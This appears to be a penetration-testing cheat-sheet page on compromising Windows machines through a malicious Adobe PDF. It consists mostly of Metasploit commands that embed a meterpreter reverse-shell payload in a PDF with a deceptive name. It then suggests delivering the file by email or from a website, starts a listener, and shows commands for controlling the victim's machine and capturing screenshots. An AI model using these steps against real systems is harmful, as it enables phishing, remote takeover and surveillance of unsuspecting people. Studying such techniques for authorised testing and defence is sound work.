Adobe PDF Attack
Last modified: 2023-07-24
Attackers can compromise target machine by sending malicious PDF.
Exploitation using Metasploit
The PDF created by this process can be easily detected by modern Windows built-in antivirus. So this exploitation may be not useful for attackers.
1. Create a PDF
Attackers can create a malicious PDF using metasploit.
msfconsole
msf> use exploit/windows/fileformat/adobe_pdf_embedded_exe
# Set payload for windows if target machine is windows
msf> set payload windows/x64/meterpreter/reverse_tcp
# Set the attacker's ip address
msf> set lhost 10.0.0.1
# Change filename
msf> set filename supersafe.pdf
# Optionally, the custom PDF can be used
msf> set infilename /path/to/custom.pdf
msf> exploit
2. Send PDF to Target Machine
After creating a PDF, attackers need to send it to target user. There are various ways to do that. For example,
- Host the PDF in attacker’s website.
- Send an email with this PDF attached.
3. Start Listener in Attacker’s Machine
To receive incoming connection from target machine, attackers start a listener in their machine.
msf> use exploit/multi/handler
# Match the payload when PDF was created
msf> set payload windows/x64/meterpreter/reverse_tcp
# Set the attacker's ip address
msf> set lhost 10.0.0.1
msf> exploit
4. Reverse Shell
When a victim open the PDF using Adobe Reader, this file starts a reverse shell to connect the attacker’s machine.
After that, attackers can control the victim’s machine in their terminal.
# In metasploit session
meterpreter> pwd
# Take a screenshot of the victim's screen
meterpreter> screenshot